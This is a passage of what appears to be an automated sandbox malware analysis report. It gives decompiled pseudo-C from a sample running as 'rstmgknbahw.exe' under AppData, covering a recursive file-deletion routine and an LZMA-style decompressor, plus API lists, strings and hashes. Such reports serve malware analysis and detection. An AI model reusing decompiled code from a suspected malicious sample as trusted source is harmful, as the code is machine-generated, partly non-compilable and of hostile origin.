							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

\*.*, xrefs: 0040540C
"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 004053B4
C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1208413142
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
